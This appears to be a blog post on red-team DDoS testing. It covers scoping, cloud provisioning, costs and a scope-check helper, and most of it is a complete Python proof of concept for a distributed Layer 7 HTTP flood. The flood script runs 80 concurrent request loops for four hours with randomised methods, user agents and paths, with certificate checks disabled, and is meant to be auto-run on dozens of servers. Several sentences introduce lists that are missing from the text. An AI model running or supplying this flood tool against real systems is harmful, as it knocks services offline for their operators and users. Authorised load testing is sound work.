⚠️ Warning: This article is intended for educational and ethical purposes only ⚠️
Red teamers don’t often engage in DDoS campaigns or stress testing against client systems, mainly for two reasons:
However, there are cases where clients explicitly request such activities. When that happens, the red team must be thoroughly prepared: legally, to clearly define the scope and methodology, and technically, to execute the engagement effectively.
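One way to tie the legal preparation to the technical side is to encode the agreed scope as data and refuse to start anything that falls outside it. The following is a minimal sketch, not a definitive implementation: the `Scope` record, its field names, and the helpers `is_in_scope` and `assert_all_in_scope` are hypothetical and only illustrate the idea of checking hosts and the authorized time window before any traffic is generated.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from urllib.parse import urlsplit


@dataclass(frozen=True)
class Scope:
    """Hypothetical record of what the client authorized in writing."""
    allowed_hosts: frozenset   # exact hostnames named in the agreement
    window_start: datetime     # start of the authorized test window
    window_end: datetime       # end of the authorized test window


def is_in_scope(scope, url, now):
    """Return True only if both the URL's host and the time are authorized."""
    host = urlsplit(url).hostname  # None when the URL has no scheme/host
    if host is None:
        return False
    in_window = scope.window_start <= now <= scope.window_end
    return host.lower() in scope.allowed_hosts and in_window


def assert_all_in_scope(scope, urls, now):
    """Raise PermissionError listing every URL that is not authorized."""
    rejected = [u for u in urls if not is_in_scope(scope, u, now)]
    if rejected:
        raise PermissionError(f"Out of scope, refusing to start: {rejected}")


if __name__ == "__main__":
    # Assumed example values; real ones come from the signed agreement.
    start = datetime(2025, 1, 10, 22, 0, tzinfo=timezone.utc)
    scope = Scope(frozenset({"target1.example"}), start, start + timedelta(hours=4))
    assert_all_in_scope(scope, ["https://target1.example"], start + timedelta(hours=1))
    print("All targets are in scope")
```

Running such a check as the very first step on every provisioned server means a typo in a target list or a late start fails loudly instead of hitting a system nobody authorized.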
If you’re a company considering this type of assessment, discuss the approach in detail with your providers. If they suggest something as simplistic as sending oversized ping packets from their workstations, take it as a red flag (no pun intended).
Given the sensitivity of DDoS testing, realism is key. A meaningful assessment requires a geographically distributed infrastructure with at least a few dozen servers.
My approach to this and other red teaming tasks involves defining infrastructure as code (using IaC tools like Terraform) and leveraging various cloud providers for provisioning.
Over time, I have automated the provisioning of various red teaming infrastructures, including:
Note that, for DDoS testing, not every cloud provider allows its infrastructure to be used this way. Depending on the specifics and use case, it could violate their terms of service or result in significant costs. Research your options thoroughly before selecting a provider to avoid potential bans or unexpected expenses. Personally, I have never spent more than a few cents per hour for the necessary infrastructure, which makes this an extremely cost-effective approach.
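To avoid unexpected expenses, the cost of an engagement can be estimated before anything is provisioned. The sketch below is plain arithmetic under stated assumptions: the function names, the per-server hourly price, and the egress figures are hypothetical placeholders, not quotes from any provider, and must be replaced with the real pricing of the provider you choose.

```python
from decimal import Decimal


def estimate_cost(servers, hourly_price, hours,
                  egress_gb=Decimal("0"), egress_price_per_gb=Decimal("0")):
    """Estimate total cost as compute (servers x price x hours) plus egress."""
    compute = Decimal(servers) * hourly_price * Decimal(hours)
    egress = egress_gb * egress_price_per_gb
    return compute + egress


def within_budget(estimate, budget):
    """Return True when the estimate does not exceed the agreed budget."""
    return estimate <= budget


if __name__ == "__main__":
    # Hypothetical figures: 30 servers, 0.01 per server-hour, 4-hour window.
    total = estimate_cost(30, Decimal("0.01"), 4)
    print(f"Estimated compute cost: {total}")
    print(f"Within a budget of 5: {within_budget(total, Decimal('5'))}")
```

`Decimal` is used instead of floats so that small per-hour prices add up exactly. Outbound traffic is often billed separately from compute, which is why the sketch keeps egress as its own term.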
Of course, simply automating the deployment of geographically distributed servers across different data centers isn’t enough: the critical component is the script that performs the actual attack. During provisioning, this script is automatically copied to the servers and executed as soon as they are ready. Its logic varies depending on the target and specific use case, but it typically involves strategies for Layer 7 (HTTP) request flooding.
Here are some tricks that can be implemented in the script:
Below is a simple Proof of Concept in Python:
import aiohttp
import asyncio
import random
import string
import ssl
from aiohttp import TCPConnector
from datetime import datetime, timedelta
DRY_RUN = False # Set to True to simulate requests
TARGET_URLS = ["https://target1.example", "https://target2.example"] # List of target URLs
DURATION = 14400 # Total duration of the attack in seconds
CONCURRENCY = 80 # Number of concurrent tasks
REQUEST_TIMEOUT = 3 # Timeout for each request in seconds
# List of User-Agent strings
USER_AGENTS = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0",
.....
.....
MANY OTHERS
]
# HTTP methods to randomize
REQUEST_METHODS = ["GET", "POST", "PUT", "DELETE"]
# Counter for successful requests
request_count = 0
# Function to fetch public IP
async def fetch_public_ip():
try:
async with aiohttp.ClientSession() as session:
async with session.get("https://api.ipify.org") as response:
ip = await response.text()
return ip
except Exception as e:
return f"Error fetching IP: {e}"
# Function to generate a random path occasionally
def generate_optional_random_path():
if random.random() < 0.35: # 35% chance of appending a random path
length = random.randint(5, 15) # Random path length
return "/" + "".join(random.choices(string.ascii_letters + string.digits, k=length))
return ""
# Function to create a session with SSL certificate validation bypassed
def create_unverified_session(timeout):
ssl_context = ssl.create_default_context()
ssl_context.check_hostname = False # Disable hostname checking
ssl_context.verify_mode = ssl.CERT_NONE # Disable certificate verification
connector = TCPConnector(ssl=ssl_context)
return aiohttp.ClientSession(connector=connector, timeout=timeout)
# Function to send HTTP requests
async def send_requests(session, end_time, target_url):
global request_count
while datetime.now() < end_time:
try:
# Generate target URL (random path occasionally)
path = generate_optional_random_path()
url = f"{target_url}{path}"
method = random.choice(REQUEST_METHODS)
if DRY_RUN:
print(f"[DRY_RUN] Simulated {method} request to {url}")
else:
headers = {"User-Agent": random.choice(USER_AGENTS)}
if method == "GET":
async with session.get(url, headers=headers, timeout=REQUEST_TIMEOUT) as response:
await response.text()
elif method == "POST":
async with session.post(url, headers=headers, data={}, timeout=REQUEST_TIMEOUT) as response:
await response.text()
elif method == "PUT":
async with session.put(url, headers=headers, data={}, timeout=REQUEST_TIMEOUT) as response:
await response.text()
elif method == "DELETE":
async with session.delete(url, headers=headers, timeout=REQUEST_TIMEOUT) as response:
await response.text()
request_count += 1
except Exception:
pass # Ignore errors
# Main attack function
async def main():
global request_count
start_time = datetime.now()
end_time = start_time + timedelta(seconds=DURATION)
# Fetch and print public IP address
print("Fetching public IP address...")
public_ip = await fetch_public_ip()
print(f"Public IP Address: {public_ip}")
print(f"Attack against targets {TARGET_URLS} started at: {start_time} (DRY_RUN: {DRY_RUN})")
timeout = aiohttp.ClientTimeout(total=REQUEST_TIMEOUT)
async with create_unverified_session(timeout) as session:
# Create tasks for each target URL
tasks = []
for target_url in TARGET_URLS:
for _ in range(CONCURRENCY // len(TARGET_URLS)): # Distribute concurrency
tasks.append(asyncio.create_task(send_requests(session, end_time, target_url)))
# Run tasks concurrently
await asyncio.sleep(DURATION)
# Cancel all tasks after the duration
for task in tasks:
task.cancel()
try:
await task
except asyncio.CancelledError:
pass
end_time_actual = datetime.now()
print(f"Attack ended at: {end_time_actual}")
print(f"Total number of requests sent: {request_count}")
# Run the script
if __name__ == "__main__":
asyncio.run(main())
That’s pretty much it!
What about you? Have you ever handled this type of activity before? How did you approach it?